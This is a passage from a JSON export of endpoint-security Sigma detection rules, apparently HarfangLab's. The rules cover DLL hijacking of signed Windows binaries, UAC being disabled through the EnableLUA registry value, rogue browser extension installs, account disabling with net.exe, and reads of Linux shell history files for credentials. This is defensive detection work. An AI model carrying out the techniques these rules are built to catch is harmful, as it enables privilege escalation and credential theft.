high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1",
"rule_name": "DLL Hijacking via bootim.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bootim.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079662Z",
"creation_date": "2026-03-23T11:45:34.079664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079668Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applysettingstemplatecatalog.yml",
"content": "title: DLL Hijacking via ApplySettingsTemplateCatalog.exe\nid: 0e9afbf0-2bb7-4577-abdb-a763825ffb58\ndescription: |\n Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplySettingsTemplateCatalog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58",
"rule_name": "DLL Hijacking via ApplySettingsTemplateCatalog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0f267464-6531-4169-a033-e710c3cdd29b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622596Z",
"creation_date": "2026-03-23T11:45:34.622598Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622602Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_lua.yml",
"content": "title: Limited User Account (LUA) Disabled\nid: 0f267464-6531-4169-a033-e710c3cdd29b\ndescription: |\n Detects Limited User Account (LUA, old name of UAC) being disabled.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process to determine whether this modification is legitimate.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n # C:\\Windows\\system32\\deviceenroller.exe /o C636116F-52B6-470F-81BC-6D6E0D8D2FE6 /c /b\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_qqgame:\n ProcessOriginalFileName: 'qqgame.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology (Shenzhen) Company Limited'\n\n exclusion_wapt:\n ProcessImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '?:\\Windows\\CCM\\smsswd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0f267464-6531-4169-a033-e710c3cdd29b",
"rule_name": "Limited User Account (LUA) Disabled",
"rule_description": "Detects Limited User Account (LUA, old name of UAC) being disabled.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process to determine whether this modification is legitimate.\n",
"rule_creation_date": "2020-12-21",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074982Z",
"creation_date": "2026-03-23T11:45:34.074984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074989Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extension_install.yml",
"content": "title: Suspicious Chrome-based Browser Extension Installed\nid: 0f4fc753-a19b-44c4-aa32-f0c68a01a0ef\ndescription: |\n Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\n Every extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\n Adversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\n It is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\nreferences:\n - https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'rename'\n selection_path:\n - Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - TargetPath:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n\n exclusion_chrome:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge SxS\\Application\\msedge.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService*'\n - '?:\\Windows\\System32\\svchost.exe -k secsvcs'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_loadstate:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n ProcessName: 'LoadState.exe'\n\n exclusion_copy:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Windows'\n ProcessImage:\n - '?:\\Windows\\System32\\xcopy.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\syswow64\\Robocopy.exe'\n\n exclusion_oobe:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessCommandLine: '?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n exclusion_dllhost:\n ProcessImage: '?:\\Windows\\System32\\dllhost.exe'\n ProcessCommandLine: '?:\\windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_transwiz:\n ProcessName: 'Transwiz.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'ForensiT Limited'\n\n exclusion_veeam:\n ProcessName: 'VeeamGuestHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Veeam Software Group GmbH'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup7Pro.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Fabrice PARISOT'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef",
"rule_name": "Suspicious Chrome-based Browser Extension Installed",
"rule_description": "Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\nEvery extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\nAdversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\nIt is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0faba2f2-3820-425b-9718-42eaa1fcb204",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074150Z",
"creation_date": "2026-03-23T11:45:34.074152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074156Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1531/"
],
"name": "t1564_net_disable_account.yml",
"content": "title: User Account Disabled via net.exe\nid: 0faba2f2-3820-425b-9718-42eaa1fcb204\ndescription: |\n Detects a user account being disabled via net1.exe.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n It is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/03/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_user:\n CommandLine|contains: 'user'\n\n selection_disable:\n CommandLine|contains:\n - '/ACTIVE:NO'\n - '\\ACTIVE:NO'\n\n condition: all of selection_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0faba2f2-3820-425b-9718-42eaa1fcb204",
"rule_name": "User Account Disabled via net.exe",
"rule_description": "Detects a user account being disabled via net1.exe.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nIt is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1531"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fc4c3c8-8e84-4478-998f-09de36df227c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622169Z",
"creation_date": "2026-03-23T11:45:34.622171Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622176Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1552_003_shell_history_read_linux.yml",
"content": "title: Shell History File Read (Linux)\nid: 0fc4c3c8-8e84-4478-998f-09de36df227c\ndescription: |\n Detects an attempt to read any of the common shell history files.\n These files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\n It can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2022/11/15\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_file:\n - Path|endswith:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n - TargetPath:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n ProcessParentImage|contains: '?'\n\n exclusion_shell:\n ProcessImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n\n exclusion_desktop_apps_and_daemons:\n ProcessImage|endswith:\n - '/nautilus'\n - '/eog'\n - '/gedit'\n - '/dolphin'\n - '/librewolf'\n - '/firefox'\n - '/chrome'\n - '/code'\n - '/codium'\n - '/sublime_text'\n - '/thunar'\n - '/slack'\n - '/file-roller'\n - '/thunderbird' # /usr/lib/thunderbird/thunderbird\n - '/thunderbird-bin' # /usr/lib/thunderbird/thunderbird-bin\n - '/@joplinapp-desktop'\n - '/gjs-console'\n - '/nemo'\n - '/bacula-fd'\n - '/xdg-desktop-portal-*'\n - '/tracker-miner-fs-3'\n\n exclusion_plasma:\n ProcessParentImage|endswith: '/usr/bin/plasmashell'\n\n exclusion_process:\n - ProcessImage:\n - '/opt/eset/*'\n - '/usr/bin/clamscan'\n - '/usr/bin/com.github.phase1geo.minder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/lib/libreoffice/program/soffice.bin'\n - '/opt/ds_agent/ds_am'\n - '/usr/lib/virtualbox/VirtualBox'\n - '*/VirtualBoxVM'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/flameshot'\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/usr/sbin/smbd'\n - '/usr/bin/rsync'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/signal/signal-desktop'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/snap/obsidian/*/obsidian'\n - '/opt/elastic/agent/data/elastic-agent-*/components/osqueryd'\n - '/usr/share/teams/teams'\n - '/opt/teams-for-linux/teams-for-linux'\n - '/snap/teams-for-linux/*/teams-for-linux'\n - '/usr/sbin/libvirtd'\n - '/opt/zotero_linux/zotero-bin'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/usr/lib/firefox-esr/firefox-esr'\n - '/usr/lib/firefox/firefox-bin'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/rocket.chat/rocketchat-desktop'\n - '/usr/bin/inkscape'\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/caja'\n - '/usr/lib/zotero/zotero-bin'\n - '/usr/bin/hstr'\n - '/usr/bin/aide'\n - '/usr/lib/mongodb-compass/mongodb compass'\n - '/usr/bin/cpio'\n - '/opt/omni/lbin/vbda'\n - '/usr/bin/geany'\n - '/usr/bin/okular'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/usr/bin/xfdesktop'\n - '/opt/elastic/agent/data/elastic-agent-*/components/agentbeat'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/nix/store/*-zen-browser-*/lib/zen-*/zen'\n - ProcessCommandLine:\n - '/opt/cybereason/sensor/bin/cbram'\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/bin/python3 /usr/bin/nagstamon'\n\n exclusion_pycharm:\n ProcessImage: '/opt/pycharm-professional/jbr/bin/java'\n ProcessCommandLine|contains: 'com.intellij.idea.main'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fc4c3c8-8e84-4478-998f-09de36df227c",
"rule_name": "Shell History File Read (Linux)",
"rule_description": "Detects an attempt to read any of the common shell history files.\nThese files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\nIt can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623164Z",
"creation_date": "2026-03-23T11:45:34.623166Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623170Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/1/mkfifo",
"https://threatpost.com/mitel-voip-bug-exploited/180079/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_fifo_file_created.yml",
